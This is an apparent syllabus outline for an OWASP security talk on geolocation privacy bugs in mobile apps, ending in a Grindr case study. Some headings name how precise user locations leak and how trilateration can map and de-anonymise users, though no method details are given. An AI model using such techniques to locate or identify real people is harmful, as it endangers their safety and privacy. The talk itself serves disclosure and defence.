Overview
Syllabus
Intro
GEOLOCATION IN MOBILE APPS incorporating geolocation is the norm
How is GEOLOCATION ACCOMPLISHED (IOS)? using the Core Location Manager
GEOLOCATION (1)OS LEVEL PROTECTIONS os-level alerts
GEO CAN 'LEAK' IF THE APPLICATION IS BUGGY ...bad for users!
THEY KNOW YOUR LOCATION
COMMON CLASSES OF GEO BUGZ can compromise a user's physical location
INSECURE NETWORK COMMS
OVER PRECISE LOCATION
USER INTERFACE
EXAMPLE OF GEO BUGS buggy apps that compromised a user's physical location
STARBUCKS overpriced coffee, plus a shot of geo tracking
WHISPER the safest place on the internet - NOPE
TINDER precise geo of nearby users, allowed tracking
ANGRY BIRDS ... they are watching you play
GRINDR'S PREVIOUS ISSUES Those who cannot learn from history are doomed to repeat it
LACK OF SSL PINNING the app does not pin its certs
REPORTING OF PRECISE GEO
LOCATION SPOOFING can spoof your location as much as you want
WIDE-OPEN APIS unauthenticated, unlimited access to APIS
'BROKEN' UI LEVEL LOGIC what you see/say isn't what you get
DISCLAIMER our goal was to help Grindr under the issues
TRILATERATION determine absolute location from relative distances
USER LOCATION so lets map some users
IDENTIFYING USERS it'd be trivial to reveal anonymous user's identities
GRINDR RESPONSE foxes & current issues
QUESTIONS & ANSWERS feel free to contact us any time!
Taught by
OWASP Foundation